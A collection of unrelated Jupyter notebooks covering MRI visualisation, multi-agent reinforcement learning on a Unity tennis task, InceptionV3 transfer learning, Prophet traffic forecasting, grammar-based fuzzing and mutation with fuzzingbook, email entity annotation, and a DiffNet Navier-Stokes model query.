# plt.figure(figsize=(10, 5))
# channel = 3
# tt = X_middle[12]
# plt.imshow(tt[:, :, layer, 3]);
# plt.title('Explore Layers of MR image', fontsize=20)
# plt.axis('off')
# return layer
# # Run the ipywidgets interact() function to explore the data
# interact(explore_3dimage, layer=(0, 16 - 1));
from ipywidgets import interact
def explore_3dimage(layer):
plt.figure(figsize=(10, 5))
channel = 3
plt.imshow(image[:, :, layer, 1]);
plt.title('Explore Layers of MR image', fontsize=20)
plt.axis('off')
return layer
# Run the ipywidgets interact() function to explore the data
interact(explore_3dimage, layer=(0, 155 - 1));
from ipywidgets import interact
def explore_3dimage(layer):
plt.figure(figsize=(10, 5))
channel = 3
# plt.imshow(y[:, :, layer, :]);
plt.imshow((y[:, :, layer, :] * 255).astype(np.uint8));
plt.title('Explore Layers of Tumor prediction', fontsize=20)
plt.axis('off')
return layer
# Run the ipywidgets interact() function to explore the data
interact(explore_3dimage, layer=(0, 155 - 1));
# from ipywidgets import interact
# def explore_3dimage(layer):
# plt.figure(figsize=(10, 5))
# channel = 3
# plt.imshow(label[:, :, layer]);
# plt.title('Explore Layers of Tumor ground truth', fontsize=20)
# plt.axis('off')
# return layer
# # Run the ipywidgets interact() function to explore the data
# interact(explore_3dimage, layer=(0, 155 - 1));
```
| github_jupyter |
# Collaboration and Competition
### 1. Start the Environment
```
from unityagents import UnityEnvironment
import numpy as np
```
**_Before running the code cell below_**, change the `file_name` parameter to match the location of the Unity environment that you downloaded.
- **Mac**: `"path/to/Tennis.app"`
- **Windows** (x86): `"path/to/Tennis_Windows_x86/Tennis.exe"`
- **Windows** (x86_64): `"path/to/Tennis_Windows_x86_64/Tennis.exe"`
- **Linux** (x86): `"path/to/Tennis_Linux/Tennis.x86"`
- **Linux** (x86_64): `"path/to/Tennis_Linux/Tennis.x86_64"`
- **Linux** (x86, headless): `"path/to/Tennis_Linux_NoVis/Tennis.x86"`
- **Linux** (x86_64, headless): `"path/to/Tennis_Linux_NoVis/Tennis.x86_64"`
For instance, if you are using a Mac, then you downloaded `Tennis.app`. If this file is in the same folder as the notebook, then the line below should appear as follows:
```
env = UnityEnvironment(file_name="Tennis.app")
```
```
env = UnityEnvironment(file_name="./Tennis_Windows_x86_64/Tennis.exe")
```
Environments contain **_brains_** which are responsible for deciding the actions of their associated agents. Here we check for the first brain available, and set it as the default brain we will be controlling from Python.
```
# get the default brain
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
```
### 2. Examine the State and Action Spaces
In this environment, two agents control rackets to bounce a ball over a net. If an agent hits the ball over the net, it receives a reward of +0.1. If an agent lets a ball hit the ground or hits the ball out of bounds, it receives a reward of -0.01. Thus, the goal of each agent is to keep the ball in play.
The observation space consists of 8 variables corresponding to the position and velocity of the ball and racket. Two continuous actions are available, corresponding to movement toward (or away from) the net, and jumping.
Run the code cell below to print some information about the environment.
```
# reset the environment
env_info = env.reset(train_mode=True)[brain_name]
# number of agents
num_agents = len(env_info.agents)
print('Number of agents:', num_agents)
# size of each action
action_size = brain.vector_action_space_size
print('Size of each action:', action_size)
# examine the state space
states = env_info.vector_observations
state_size = states.shape[1]
print('There are {} agents. Each observes a state with length: {}'.format(states.shape[0], state_size))
print('The state for the first agent looks like:', states[0])
```
### 3. Take Random Actions in the Environment
The cell below shows how to use the Python API to control the agents and receive feedback from the environment. Once this cell is executed, you will watch the agents' performance, if they select actions at random with each time step. A window should pop up that allows you to observe the agents.
```
# for i in range(1, 6): # play game for 5 episodes
# env_info = env.reset(train_mode=False)[brain_name] # reset the environment
# states = env_info.vector_observations # get the current state (for each agent)
# scores = np.zeros(num_agents) # initialize the score (for each agent)
# while True:
# actions = np.random.randn(num_agents, action_size) # select an action (for each agent)
# actions = np.clip(actions, -1, 1) # all actions between -1 and 1
# print('actions',actions )
# env_info = env.step(actions)[brain_name] # send all actions to tne environment
# next_states = env_info.vector_observations # get next state (for each agent)
# rewards = env_info.rewards # get reward (for each agent)
# dones = env_info.local_done # see if episode finished
# scores += env_info.rewards # update the score (for each agent)
# states = next_states # roll over states to next time step
# print('states',next_states )
# print('rewards',rewards )
# print('dones',dones )
# if np.any(dones): # exit loop if episode finished
# break
# print('Score (max over agents) from episode {}: {}'.format(i, np.max(scores)))
```
When finished, you can close the environment.
```
# env.close()
```
### 4. Training The Agents
```
from collections import deque
from itertools import count
import torch
import time
import matplotlib.pyplot as plt
from ddpg_agent import DDPGAgent
from ddpg_network import Actor, Critic
from multi_agent_ddpg import MADDPG
random_seed=5
meta_agent = MADDPG(num_agents=num_agents,state_size=state_size, action_size=action_size,random_seed=random_seed)
def train_maddpg(n_episodes=10000, max_t=1000):
avg_score = []
scores=[] # list containing scores from each episode
scores_window = deque(maxlen=100)
for i_episode in range(1, n_episodes+1):
env_info = env.reset(train_mode=True)[brain_name]
meta_agent.reset_agents()
states = env_info.vector_observations
score = np.zeros(num_agents)
for t in range(max_t):
actions = meta_agent.act(states, add_noise=True)
#Take action and observe reward and next state
env_info = env.step(actions)[brain_name] # send the actions to the environment
next_states = env_info.vector_observations # get the next states
rewards = env_info.rewards # get the rewards
dones = env_info.local_done # see if episode has finished
#Store experience tuple (s,a,s',r) in replay memory and learn from minibatch
meta_agent.step(states, actions, rewards, next_states, dones, i_episode)
states = next_states
score += rewards
if np.any(dones):
break
scores_window.append(np.max(score)) # episode score is max of the agents
scores.append(score) # save most recent score
avg_score= np.mean(scores_window)
print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end="")
if i_episode%100==0:
print('\n Episode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end="")
meta_agent.save_checkpoint()
if avg_score>0.5:
print('\n Episode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end="")
print('Environment solved!')
meta_agent.save_checkpoint()
return scores,avg_score
return scores,avg_score
%%time
scores,avg_score = train_maddpg(10000,2000)
env.close()
#Save scores
np.save('MADDPG_scores.npy', np.array(scores))
# scores = np.load('MADDPG_scores.npy')
scores=np.asarray(scores)
plt.figure(figsize=(12,6))
plt.rc('font', size=20) # controls default text sizes
plt.rc('axes', titlesize=20) # fontsize of the axes title
plt.rc('axes', labelsize=20) # fontsize of the x and y labels
plt.rc('xtick', labelsize=20) # fontsize of the tick labels
plt.rc('ytick', labelsize=20) # fontsize of the tick labels
plt.rc('legend', fontsize=20) # legend fontsize
plt.rc('figure', titlesize=20) # fontsize of the figure title
plt.plot(scores[:,0],'b.')
plt.plot(scores[:,1],'r')
plt.plot(np.amax(scores,axis=1),'k')
plt.grid()
plt.xlabel('Episode')
plt.ylabel('Score')
plt.title('MADDPG')
plt.show()
```
| github_jupyter |
```
import os
from tensorflow.keras import layers
from tensorflow.keras import Model
!wget --no-check-certificate \
https://storage.googleapis.com/mledu-datasets/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5 \
-O /tmp/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5
from tensorflow.keras.applications.inception_v3 import InceptionV3
local_weights_file = '/tmp/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5'
pre_trained_model = InceptionV3(input_shape = (150, 150, 3),
include_top = False,
weights = None)
pre_trained_model.load_weights(local_weights_file)
for layer in pre_trained_model.layers:
layer.trainable = False
# pre_trained_model.summary()
last_layer = pre_trained_model.get_layer('mixed7')
print('last layer output shape: ', last_layer.output_shape)
last_output = last_layer.output
# pre_trained_model.summary()
from tensorflow.keras.optimizers import RMSprop
# Flatten the output layer to 1 dimension
x = layers.Flatten()(last_output)
# Add a fully connected layer with 1,024 hidden units and ReLU activation
x = layers.Dense(1024, activation='relu')(x)
# Add a dropout rate of 0.2
x = layers.Dropout(0.2)(x)
# Add a final sigmoid layer for classification
x = layers.Dense (1, activation='sigmoid')(x)
model = Model( pre_trained_model.input, x)
model.compile(optimizer = RMSprop(lr=0.0001),
loss = 'binary_crossentropy',
metrics = ['acc'])
# model.summary()
!wget --no-check-certificate \
https://storage.googleapis.com/mledu-datasets/cats_and_dogs_filtered.zip \
-O /tmp/cats_and_dogs_filtered.zip
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import os
import zipfile
local_zip = '//tmp/cats_and_dogs_filtered.zip'
zip_ref = zipfile.ZipFile(local_zip, 'r')
zip_ref.extractall('/tmp')
zip_ref.close()
# Define our example directories and files
base_dir = '/tmp/cats_and_dogs_filtered'
train_dir = os.path.join( base_dir, 'train')
validation_dir = os.path.join( base_dir, 'validation')
train_cats_dir = os.path.join(train_dir, 'cats') # Directory with our training cat pictures
train_dogs_dir = os.path.join(train_dir, 'dogs') # Directory with our training dog pictures
validation_cats_dir = os.path.join(validation_dir, 'cats') # Directory with our validation cat pictures
validation_dogs_dir = os.path.join(validation_dir, 'dogs')# Directory with our validation dog pictures
train_cat_fnames = os.listdir(train_cats_dir)
train_dog_fnames = os.listdir(train_dogs_dir)
# Add our data-augmentation parameters to ImageDataGenerator
train_datagen = ImageDataGenerator(rescale = 1./255.,
rotation_range = 40,
width_shift_range = 0.2,
height_shift_range = 0.2,
shear_range = 0.2,
zoom_range = 0.2,
horizontal_flip = True)
# Note that the validation data should not be augmented!
test_datagen = ImageDataGenerator( rescale = 1.0/255. )
# Flow training images in batches of 20 using train_datagen generator
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size = 20,
class_mode = 'binary',
target_size = (150, 150))
# Flow validation images in batches of 20 using test_datagen generator
validation_generator = test_datagen.flow_from_directory( validation_dir,
batch_size = 20,
class_mode = 'binary',
target_size = (150, 150))
history = model.fit_generator(
train_generator,
validation_data = validation_generator,
steps_per_epoch = 100,
epochs = 20,
validation_steps = 50,
verbose = 2)
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'r', label='Training accuracy')
plt.plot(epochs, val_acc, 'b', label='Validation accuracy')
plt.title('Training and validation accuracy')
plt.legend(loc=0)
plt.figure()
plt.show()
```
| github_jupyter |
# McKinsey Analytics Online Hackathon
### Imports
```
import pandas as pd
import numpy as np
from fbprophet import Prophet
import matplotlib.pyplot as plt
%matplotlib inline
plt.rcParams['figure.figsize']=(20,10)
plt.style.use('ggplot')
```
### Data Loading and Handling
```
sales_df = pd.read_csv('train_aWnotuB.csv', index_col='DateTime', parse_dates=True)
j1_train=df_train[df_train['Junction']==1]
j2_train=df_train[df_train['Junction']==2]
j3_train=df_train[df_train['Junction']==3]
j4_train=df_train[df_train['Junction']==4]
j1_train.drop(['Junction','ID'],1,inplace=True)
j2_train.drop(['Junction','ID'],1,inplace=True)
j3_train.drop(['Junction','ID'],1,inplace=True)
j4_train.drop(['Junction','ID'],1,inplace=True)
```
### Junction 1
```
df = j1_train.reset_index()
df=df.rename(columns={'DateTime':'ds', 'Vehicles':'y'})
df['y'] = np.log(df['y'])
model = Prophet(yearly_seasonality=True)
model.add_seasonality(name='monthly', period=30.5, fourier_order=5)
model.fit(df);
future = model.make_future_dataframe(periods=2952,freq='H')
forecast = model.predict(future)
df.set_index('ds', inplace=True)
forecast.set_index('ds', inplace=True)
viz_df_j1 = j1_train.join(forecast[['yhat', 'yhat_lower','yhat_upper']], how = 'outer')
viz_df_j1['yhat_rescaled'] = np.exp(viz_df['yhat'])
junction1=viz_df_j1[-2952:]
junction1['Vehicles'] = junction1['yhat_rescaled']
junction1.drop(['yhat','yhat_lower','yhat_upper','yhat_rescaled'],1,inplace=True)
```
### Junction 2
```
df = j2_train.reset_index()
df=df.rename(columns={'DateTime':'ds', 'Vehicles':'y'})
df['y'] = np.log(df['y'])
model = Prophet(yearly_seasonality=True)
model.add_seasonality(name='monthly', period=30.5, fourier_order=5)
model.fit(df);
future = model.make_future_dataframe(periods=2952,freq='H')
forecast = model.predict(future)
df.set_index('ds', inplace=True)
forecast.set_index('ds', inplace=True)
viz_df_j2 = j2_train.join(forecast[['yhat', 'yhat_lower','yhat_upper']], how = 'outer')
viz_df_j2['yhat_rescaled'] = np.exp(viz_df_j2['yhat'])
junction2=viz_df_j2[-2952:]
junction2['Vehicles'] = junction2['yhat_rescaled']
junction2.drop(['yhat','yhat_lower','yhat_upper','yhat_rescaled'],1,inplace=True)
```
### Junction 3
```
df = j3_train.reset_index()
df=df.rename(columns={'DateTime':'ds', 'Vehicles':'y'})
df['y'] = np.log(df['y'])
df['cap'] = 6
model = Prophet(growth='logistic')
model.add_seasonality(name='monthly', period=30.5, fourier_order=5)
model.fit(df);
future = model.make_future_dataframe(periods=2952,freq='H')
future['cap'] = 6
forecast = model.predict(future)
df.set_index('ds', inplace=True)
forecast.set_index('ds', inplace=True)
viz_df_j3 = j3_train.join(forecast[['yhat', 'yhat_lower','yhat_upper']], how = 'outer')
viz_df_j3['yhat_rescaled'] = np.exp(viz_df_j3['yhat'])
junction3=viz_df_j3[-2952:]
junction3['Vehicles'] = junction3['yhat_rescaled']
junction3.drop(['yhat','yhat_lower','yhat_upper','yhat_rescaled'],1,inplace=True)
```
### Junction 4
```
df = j4_train.reset_index()
df=df.rename(columns={'DateTime':'ds', 'Vehicles':'y'})
df['y'] = np.log(df['y'])
df['cap'] = 4
model = Prophet(growth='logistic')
model.add_seasonality(name='monthly', period=30.5, fourier_order=5)
model.fit(df);
future = model.make_future_dataframe(periods=2952,freq='H')
future['cap'] = 4
forecast = model.predict(future)
df.set_index('ds', inplace=True)
forecast.set_index('ds', inplace=True)
viz_df_j4 = j4_train.join(forecast[['yhat', 'yhat_lower','yhat_upper']], how = 'outer')
viz_df_j4['yhat_rescaled'] = np.exp(viz_df_j4['yhat'])
junction4=viz_df_j4[-2952:]
junction4['Vehicles'] = junction4['yhat_rescaled']
junction4.drop(['yhat','yhat_lower','yhat_upper','yhat_rescaled'],1,inplace=True)
```
### Solution File
```
junction1['Junction']=1
junction2['Junction']=2
junction3['Junction']=3
junction4['Junction']=4
junction1['DateTime']=junction1.index
junction1=junction1[['DateTime','Junction','Vehicles']]
junction1.reset_index(drop=True,inplace=True)
junction2['DateTime']=junction2.index
junction2=junction2[['DateTime','Junction','Vehicles']]
junction2.reset_index(drop=True,inplace=True)
junction3['DateTime']=junction3.index
junction3=junction3[['DateTime','Junction','Vehicles']]
junction3.reset_index(drop=True,inplace=True)
junction4['DateTime']=junction4.index
junction4=junction4[['DateTime','Junction','Vehicles']]
junction4.reset_index(drop=True,inplace=True)
final_forecast=junction1.append(junction2,ignore_index=True)
final_forecast=final_forecast.append(junction3,ignore_index=True)
final_forecast=final_forecast.append(junction4,ignore_index=True)
test=pd.read_csv('test_BdBKkAj.csv')
test['Vehicles']=final_forecast['Vehicles']
test.to_csv('final_forecast.csv')
```
| github_jupyter |
# Mutations with Grammars
In this notebook, we make a very short and simple introduction on how to use the `fuzzingbook` framework for grammar-based mutation – both for data and for code.
**Prerequisites**
* This chapter is meant to be self-contained.
## Defining Grammars
We define a grammar using standard Python data structures. Suppose we want to encode this grammar:
```
<start> ::= <expr>
<expr> ::= <term> + <expr> | <term> - <expr> | <term>
<term> ::= <term> * <factor> | <term> / <factor> | <factor>
<factor> ::= +<factor> | -<factor> | (<expr>) | <integer> | <integer>.<integer>
<integer> ::= <digit><integer> | <digit>
<digit> ::= 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9
```
```
import fuzzingbook_utils
from Grammars import syntax_diagram, is_valid_grammar, convert_ebnf_grammar, srange, crange
```
In Python, we encode this as a mapping (a dictionary) from nonterminal symbols to a list of possible expansions:
```
EXPR_GRAMMAR = {
"<start>":
["<expr>"],
"<expr>":
["<term> + <expr>", "<term> - <expr>", "<term>"],
"<term>":
["<factor> * <term>", "<factor> / <term>", "<factor>"],
"<factor>":
["+<factor>",
"-<factor>",
"(<expr>)",
"<integer>.<integer>",
"<integer>"],
"<integer>":
["<digit><integer>", "<digit>"],
"<digit>":
["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
}
assert is_valid_grammar(EXPR_GRAMMAR)
syntax_diagram(EXPR_GRAMMAR)
```
## Fuzzing with Grammars
We mostly use grammars for _fuzzing_, as in here:
```
from GrammarFuzzer import GrammarFuzzer
expr_fuzzer = GrammarFuzzer(EXPR_GRAMMAR)
for i in range(10):
print(expr_fuzzer.fuzz())
```
## Parsing with Grammars
We can parse a given input using a grammar:
```
expr_input = "2 + -2"
from Parser import EarleyParser, display_tree, tree_to_string
expr_parser = EarleyParser(EXPR_GRAMMAR)
expr_tree = list(expr_parser.parse(expr_input))[0]
display_tree(expr_tree)
```
Internally, each subtree is a pair of a node and a list of children (subtrees)
```
expr_tree
```
## Mutating a Tree
We define a simple mutator that traverses an AST to mutate it.
```
def swap_plus_minus(tree):
node, children = tree
if node == " + ":
node = " - "
elif node == " - ":
node = " + "
return node, children
def apply_mutator(tree, mutator):
node, children = mutator(tree)
return node, [apply_mutator(c, mutator) for c in children]
mutated_tree = apply_mutator(expr_tree, swap_plus_minus)
display_tree(mutated_tree)
```
## Unparsing the Mutated Tree
To unparse, we traverse the tree and look at all terminal symbols:
```
tree_to_string(mutated_tree)
```
## Lots of mutations
```
for i in range(10):
s = expr_fuzzer.fuzz()
s_tree = list(expr_parser.parse(s))[0]
s_mutated_tree = apply_mutator(s_tree, swap_plus_minus)
s_mutated = tree_to_string(s_mutated_tree)
print(' ' + s + '\n-> ' + s_mutated + '\n')
```
## Another Example: JSON
```
import string
CHARACTERS_WITHOUT_QUOTE = (string.digits
+ string.ascii_letters
+ string.punctuation.replace('"', '').replace('\\', '')
+ ' ')
JSON_EBNF_GRAMMAR = {
"<start>": ["<json>"],
"<json>": ["<element>"],
"<element>": ["<ws><value><ws>"],
"<value>": ["<object>", "<array>", "<string>", "<number>", "true", "false", "null"],
"<object>": ["{<ws>}", "{<members>}"],
"<members>": ["<member>(,<members>)*"],
"<member>": ["<ws><string><ws>:<element>"],
"<array>": ["[<ws>]", "[<elements>]"],
"<elements>": ["<element>(,<elements>)*"],
"<element>": ["<ws><value><ws>"],
"<string>": ['"' + "<characters>" + '"'],
"<characters>": ["<character>*"],
"<character>": srange(CHARACTERS_WITHOUT_QUOTE),
"<number>": ["<int><frac><exp>"],
"<int>": ["<digit>", "<onenine><digits>", "-<digits>", "-<onenine><digits>"],
"<digits>": ["<digit>+"],
"<digit>": ['0', "<onenine>"],
"<onenine>": crange('1', '9'),
"<frac>": ["", ".<digits>"],
"<exp>": ["", "E<sign><digits>", "e<sign><digits>"],
"<sign>": ["", '+', '-'],
"<ws>": ["( )*"]
}
assert is_valid_grammar(JSON_EBNF_GRAMMAR)
JSON_GRAMMAR = convert_ebnf_grammar(JSON_EBNF_GRAMMAR)
syntax_diagram(JSON_GRAMMAR)
json_input = '{"conference": "ICSE"}'
json_parser = EarleyParser(JSON_GRAMMAR)
json_tree = list(json_parser.parse(json_input))[0]
display_tree(json_tree)
def swap_venue(tree):
if tree_to_string(tree) == '"ICSE"':
tree = list(json_parser.parse('"ICST"'))[0]
return tree
mutated_tree = apply_mutator(json_tree, swap_venue)
tree_to_string(mutated_tree)
```
| github_jupyter |
```
import pandas as pd
import numpy as np
import re
from itertools import accumulate
emails = pd.read_csv(r'C:\Users\amrenkumar\Desktop\TestData\full-output1.csv')
emails.shape
emails_clean = emails[~emails.interaction_content.isnull()]
emails_clean = emails_clean.interaction_content
emails_clean.drop_duplicates(keep='first', inplace=True)
emails_clean.head()
email_clean= emails_clean.str.replace("[^a-zA-Z0-9. ]", "")
#email_clean= emails_clean.interaction_content.str
for i in email_clean[0:1]:
print(i)
import nltk
from nltk.tag import pos_tag
from nltk import ne_chunk
nltk.download('averaged_perceptron_tagger')
nltk.download('maxent_ne_chunker')
nltk.download('words')
nltk.download('punkt')
sent_tokens=[]
for i in list(email_clean):
sent_tokens.append(nltk.sent_tokenize(i))
sents = []
for sent in range(len(sent_tokens)):
for i in range(len(sent_tokens[sent])):
sents.append(sent_tokens[sent][i])
len(sents)
sents[3]
sents= list(set(sents))
def tokenizer(sent):
tokens = nltk.word_tokenize(sent)
tags = nltk.pos_tag(tokens)
tag_p = []
for i in range(len(tags)):
tag_p.append(tags[i][1])
#token_len = []
#for i in tokens:
# token_len.append(len(i)+1)
#list2 = list(accumulate(token_len))
#list2 = [x -1 for x in list2 ]
#list0 = [0]
#for i in list2:
# list0.append(i+1)
#data = pd.DataFrame(list(zip(tokens,list0,list2, tag_p)))
data = pd.DataFrame(list(zip(tokens,tag_p)))
return data
df_final= pd.DataFrame()
for i,sent in enumerate(sents):
df = tokenizer(sent)
df['Sent'] = "Sentence:" + str(i)
df_final = df_final.append(df)
df_final.to_csv('Annotation.csv')
df_final.columns = ['Token','POS','Sent']
df_final = df_final[['Sent','Token','POS']]
from nltk.util import ngrams
grams_list=[]
for sent in sents:
for i in range(5):
grams_list.extend(list(ngrams(nltk.word_tokenize(sent),i+1)))
l1=[]
for i in grams_list:
l1.append(' '.join(i))
company = pd.read_csv('company.csv')
company = company.TYPE.map(lambda x: x.lower())
company[2]
len(l1)
time = pd.read_csv('time.csv')
time = time.Time.map(lambda x: x.lower())
email_tokens_multi_size = [x.lower() for x in l1]
email_tokens_single = [x.lower() for x in l1 if len(x.split())==1]
company_matched = frozenset(company).intersection(email_tokens_multi_size)
len(company_matched)
time_matched = frozenset(time).intersection(email_tokens_multi_size)
currency = pd.read_csv(r'C:\Users\amrenkumar\Desktop\TestData\Currency.csv')
currency = currency.Currency.map(lambda x: x.lower())
currency_matched = frozenset(currency).intersection(email_tokens_multi_size)
len(currency_matched)
location = pd.read_csv(r'C:\Users\amrenkumar\Desktop\TestData\location.csv')
location = location.Location.map(lambda x: x.lower())
location_matched = frozenset(location).intersection(email_tokens_multi_size)
len(location_matched)
def token_annotate(tokens,entity,entity_type):
tokens_tagged = tokens
if entity_type == 'company':
b_entity = ' B-org'
i_entity = ' I-org'
elif entity_type == 'time':
b_entity = ' B-tim'
i_entity = ' I-tim'
elif entity_type == 'currency':
b_entity = ' B-cur'
i_entity = ' I-cur'
elif entity_type == 'location':
b_entity = ' B-geo'
i_entity = ' I-geo'
for i, v in enumerate(tokens):
for i1, v1 in enumerate(entity):
if len(v1.split())==5:
if v == v1.split()[0] and v1.split()[1] == tokens[i+1] and v1.split()[2] == tokens[i+2] and v1.split()[3] == tokens[i+3] and v1.split()[4] == tokens[i+4]:
tokens_tagged[i]=tokens[i] + b_entity
tokens_tagged[i+1]=tokens[i+1] + i_entity
tokens_tagged[i+2]=tokens[i+2] + i_entity
tokens_tagged[i+3]=tokens[i+3] + i_entity
tokens_tagged[i+4]=tokens[i+4] + i_entity
if len(v1.split())==4:
if v == v1.split()[0] and v1.split()[1] == tokens[i+1] and v1.split()[2] == tokens[i+2] and v1.split()[3] == tokens[i+3]:
tokens_tagged[i]=tokens[i] + b_entity
tokens_tagged[i+1]=tokens[i+1] + i_entity
tokens_tagged[i+2]=tokens[i+2] + i_entity
tokens_tagged[i+3]=tokens[i+3] + i_entity
if len(v1.split())==3:
if v == v1.split()[0] and v1.split()[1] == tokens[i+1] and v1.split()[2] == tokens[i+2]:
tokens_tagged[i]=tokens[i] + b_entity
tokens_tagged[i+1]=tokens[i+1] + i_entity
tokens_tagged[i+2]=tokens[i+2] + i_entity
if len(v1.split())==2:
if v == v1.split()[0] and v1.split()[1] == tokens[i+1]:
tokens_tagged[i]=tokens[i] + b_entity
tokens_tagged[i+1]=tokens[i+1] + i_entity
if len(v1.split())==1:
if v == v1.split()[0]:
tokens_tagged[i]=tokens[i] + b_entity
return tokens_tagged
print(pd.datetime.now())
t = token_annotate(email_tokens_single, time_matched,'time')
print(pd.datetime.now())
len(email_tokens_single)
t_company = token_annotate(t, company_matched, 'company')
print(pd.datetime.now())
t_currency = token_annotate(t_company, currency_matched, 'currency')
t_location = token_annotate(t_currency, location_matched, 'location')
t1=[]
for i in t_location:
t1.append(i.split())
t1
tagged_Tokens = pd.DataFrame(t1, columns=['Token','Tag', 'Tag1'])
tagged_Tokens.drop('Tag1', axis=1, inplace=True)
tagged_Tokens.Tag = tagged_Tokens.Tag.fillna('O')
df_annotated_final = pd.concat([df_final.reset_index(drop=True),
tagged_Tokens["Tag"].reset_index(drop=True)], axis=1)
df_annotated_final.loc[(df_annotated_final.Tag=='B-geo') & (df_annotated_final.Token=='strong') , ['Tag']] = 'O'
df_annotated_final.to_csv('df_annotated.csv')
df_annotated_final.head()
df_annotated_final.shape
df_annotated_final[df_annotated_final.Tag!='O'].shape
sents[10]
df_annotated_final = pd.read_csv('df_annotated.csv')
set(df_annotated_final.Tag)
df_annotated_final.loc[(df_annotated_final.Tag=='B-cur') , ['Tag']] = 'O'
df_annotated_final.to_csv('df_annotated.csv')
sents_with_tags = list(set(df_annotated_final[df_annotated_final.Tag!='O'].Sent))
len(sents_with_tags)
set(df_annotated_final_clean.Tag)
df_annotated_final_clean = df_annotated_final[df_annotated_final['Sent'].isin(sents_with_tags)]
df_annotated_final_clean.shape
df_annotated_final.shape
df_annotated_final_clean.to_csv('df_annotated.csv')
df_annotated_final_clean.loc[(df_annotated_final_clean.Tag=='I-org') , ['Tag']] = 'I-comp'
df_annotated_final_clean
```
| github_jupyter |
```
import os
import sys
import math
import json
import torch
import PIL
import numpy as np
from tqdm import tqdm
import scipy.io
from scipy import ndimage
import matplotlib
# from skimage import io
# matplotlib.use("pgf")
matplotlib.rcParams.update({
# 'font.family': 'serif',
'font.size':8,
})
from matplotlib import pyplot as plt
import pytorch_lightning as pl
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.loggers import TensorBoardLogger
seed_everything(42)
import DiffNet
from DiffNet.DiffNetFEM import DiffNet2DFEM
from torch.utils import data
from DiffNet.networks.autoencoders import AE
# from e1_stokes_base_resmin import Stokes2D
from pytorch_lightning.callbacks.base import Callback
torch.set_printoptions(precision=10)
from e2_ns_fpc_embedded_airfoil import NS_FPC_Dataset, NS_FPC, OptimSwitchLBFGS
image_dataset_dir = '../test-dataset-fpc'
dirname = './ns_fpc_af/version_4/selected_query_inputs'
case_dir = './ns_fpc_af/version_4'
query_out_path = os.path.join(case_dir, 'selected_query_outputs')
if not os.path.exists(query_out_path):
os.makedirs(query_out_path)
mapping_type = 'network'
lx = 5.
ly = 12.
Nx = 256
Ny = 128
domain_size = 128
Re = 1.
dir_string = "ns_fpc_af"
max_epochs = 50001
plot_frequency = 1
LR = 2e-4
opt_switch_epochs = max_epochs
load_from_prev = False
load_version_id = 37
enable_progress_bar = True
# print("argv = ", sys.argv)
# if len(sys.argv) > 1:
# enable_progress_bar = bool(int(sys.argv[1]))
# print("enable_progress_bar = ", enable_progress_bar)
x = np.linspace(0, 1, Nx)
y = np.linspace(0, 1, Ny)
xx , yy = np.meshgrid(x, y)
net_u = torch.load(os.path.join(case_dir, 'net_u.pt'))
net_v = torch.load(os.path.join(case_dir, 'net_v.pt'))
net_p = torch.load(os.path.join(case_dir, 'net_p.pt'))
net_u.to('cpu')
net_v.to('cpu')
net_p.to('cpu')
dataset = NS_FPC_Dataset(dirname=image_dataset_dir, domain_lengths=(lx,ly), domain_sizes=(Nx,Ny), Re=Re)
network = (net_u, net_v, net_p)
basecase = NS_FPC(network, dataset, domain_lengths=(lx,ly), domain_sizes=(Nx,Ny), batch_size=32, fem_basis_deg=1, learning_rate=LR, plot_frequency=plot_frequency, mapping_type=mapping_type)
#network = GoodNetwork(in_channels=2, out_channels=1, in_dim=64, out_dim=64)
# basecase = Poisson(network, dataset, batch_size=16, domain_size=256)
nsample = len(basecase.dataset)
print("nsample = ", nsample)
# def do_query(net_u, net_v, net_p, inputs_tensor, forcing_tensor):
# domain = inputs_tensor[:,5:6,:,:].type_as(next(self.net_u.parameters()))
# u = net_u(domain)
# v = net_v(domain)
# p = net_p(domain)
# # extract diffusivity and boundary conditions here
# x = inputs_tensor[:,0:1,:,:]
# y = inputs_tensor[:,1:2,:,:]
# bc1 = inputs_tensor[:,2:3,:,:]
# bc2 = inputs_tensor[:,3:4,:,:]
# bc3 = inputs_tensor[:,4:5,:,:]
# domain = inputs_tensor[:,5:6,:,:]
# # apply boundary conditions
# u_bc = self.u_bc.unsqueeze(0).unsqueeze(0).type_as(u)
# v_bc = self.v_bc.unsqueeze(0).unsqueeze(0).type_as(u)
# p_bc = self.p_bc.unsqueeze(0).unsqueeze(0).type_as(u)
# u = torch.where(bc1>=0.5, u_bc, u)
# u = torch.where(domain<0.5, domain, u)
# v = torch.where(bc2>=0.5, v_bc, v)
# v = torch.where(domain<0.5, domain, v)
# # p = torch.where(bc3>=0.5, p_bc, p)
# return u, v, p
net_u.parameters().__next__().device
with torch.no_grad():
for i in range(nsample//10+1):
id0 = 10*i
id1 = id0+10
if id1 > nsample:
id1 = nsample
# core query code
inputs, forcing = basecase.dataset[id0:id1]
u, v, p, u_x_gp, v_y_gp = basecase.do_query(inputs, forcing)
# query_plot_contours_and_save(query_out_path, nu_par_list, f_par_list, u_par_list, i)
u = u.squeeze().cpu()
v = v.squeeze().cpu()
p = p.squeeze().cpu()
for i in range(nsample):
# core query code
ui = u[i]
vi = v[i]
pi = p[i]
# plotting
num_query = 1
plt_num_row = num_query
plt_num_col = 3
fig, axs = plt.subplots(plt_num_row, plt_num_col, figsize=(5*plt_num_col,10*plt_num_row),
subplot_kw={'aspect': 'auto'}, sharex=True, sharey=True, squeeze=True)
# fig, axs = plt.subplots(plt_num_row, plt_num_col, figsize=(2*plt_num_col,2*plt_num_row),
# subplot_kw={'aspect': 'auto'},sharey=True)
#fig.tight_layout()
for ax in axs:
ax.set_xticks([])
ax.set_yticks([])
for idx in range(num_query):
# extract diffusivity and boundary conditions here
im0 = axs[0].imshow(ui,cmap='jet')
cb = fig.colorbar(im0, ax=axs[0], fraction=0.04, pad=0.1,orientation="horizontal")
